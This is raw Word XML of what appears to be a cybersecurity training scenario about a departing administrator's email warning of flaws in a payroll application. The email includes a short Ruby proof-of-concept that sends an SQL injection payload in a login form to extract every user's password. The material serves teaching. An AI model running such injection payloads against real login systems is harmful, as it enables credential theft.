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09A" w:rsidRPr="00CD1627" w:rsidRDefault="0071109A" w:rsidP="00CD1627">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>DMZ Server Concerns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071109A" w:rsidRDefault="0071109A">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6DE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Before resigning from the organization to take a job out of state, </w:t>
      </w:r>
      <w:r w:rsidR="00405362">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Shannon Garland (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6DE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the system administrator that managed the DMZ server</w:t>
      </w:r>
      <w:r w:rsidR="00405362">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6DE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided a list of concerns to the IASO. This communication was emailed while the IASO was out on a short vacation, so the team is now responding to the information. The Organization’s current system administrator is assigned responsibility over the Domain Controller and now the DMZ Server, and will need to work with the Vulnerability Manager to investigate and/or address concerns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038303B" w:rsidRDefault="0038303B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00405362" w:rsidRPr="00CD1627" w:rsidRDefault="00405362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>Shannon.Garland@gmips.gov</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00405362" w:rsidRPr="00CD1627" w:rsidRDefault="00405362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>To:</w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>Jimmie.Potter@gmips.gov</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0038303B" w:rsidRPr="00CD1627" w:rsidRDefault="00405362">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Subject:</w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> DMZ Server Concerns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A47BA" w:rsidRPr="00CD1627" w:rsidRDefault="0031337D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Jimmie, </w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">I would love to stay and help address the issues I have observed on the new DMZ Server and </w:t>
      </w:r>
      <w:r w:rsidR="0071109A" w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Payroll Application</w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> but since I’m leaving next week I wanted to at least give you the information I have so far.  I’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>m sure Vanessa can get these figured out and</w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="00CD1627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="009F2CD0" w:rsidRDefault="0031337D" w:rsidP="009F2CD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Payroll Application- </w:t>
      </w:r>
      <w:r w:rsidR="00405362" w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>I’m not an expert with PHP</w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, but the code that we were provided by the </w:t>
      </w:r>
      <w:r w:rsidR="00027D17" w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00027D17" w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r w:rsidR="00027D17" w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> party </w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vendor just looked to</w:t>
      </w:r>
      <w:r w:rsidR="008758A6" w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="0038303B" w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> simple.  I started to experiment and have a proof-of-concept that you can use as a starting point.  I</w:t>
      </w:r>
      <w:r w:rsidRPr="009F2CD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> think this explains some of my concern:</w:t>
      </w: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require</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'net/http'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="0031337D" w:rsidRDefault="0031337D" w:rsidP="0031337D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="0031337D" w:rsidRDefault="0031337D" w:rsidP="0031337D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> "http://127.0.0.1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>payroll_app.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="0031337D" w:rsidRDefault="0031337D" w:rsidP="0031337D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> URI(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Shannon.Garland</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>'</w:t>
      </w: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injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "password'; select password from users where username='' OR ''='"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="0031337D" w:rsidRDefault="0031337D" w:rsidP="0031337D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pP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puts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Making POST request to #{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>} with the following parameters:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="0031337D" w:rsidRDefault="0031337D" w:rsidP="0031337D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">puts "'user' = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>user}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="0031337D" w:rsidRDefault="0031337D" w:rsidP="0031337D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">puts "'password' = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>injection}"</w:t>
      </w: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res</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Net::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>HTTP.post_form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, 'user' =&gt; user, 'password' =&gt; injection, 's' =&gt; 'OK')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="0031337D" w:rsidRDefault="0031337D" w:rsidP="0031337D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pP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puts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Response body is #{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>res.body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="0031337D" w:rsidRDefault="0031337D" w:rsidP="0031337D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBd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puts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031337D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Done"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031337D" w:rsidRPr="00A5777B" w:rsidRDefault="0031337D" w:rsidP="00A5777B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0031337D" w:rsidRPr="00A5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F473C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1212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A5B60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53EE2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9A"/>
    <w:rsid w:val="000138A1"/>
    <w:rsid w:val="00027D17"/>
    <w:rsid w:val="0031337D"/>
    <w:rsid w:val="0038303B"/>
    <w:rsid w:val="00405362"/>
    <w:rsid w:val="0071109A"/>
    <w:rsid w:val="008758A6"/>
    <w:rsid w:val="009A47BA"/>
    <w:rsid w:val="009F2CD0"/>
    <w:rsid w:val="00A5777B"/>
    <w:rsid w:val="00BA6DE8"/>
    <w:rsid w:val="00CD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18D9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3578ABE1-05B7-429E-A8F9-EA124359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03B"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00313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mmie.Potter@gmips.gov" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Shannon.Garland@gmip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Augusta University</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Sarah D.</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rees, Sarah D.</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-17T14:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-21T15:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>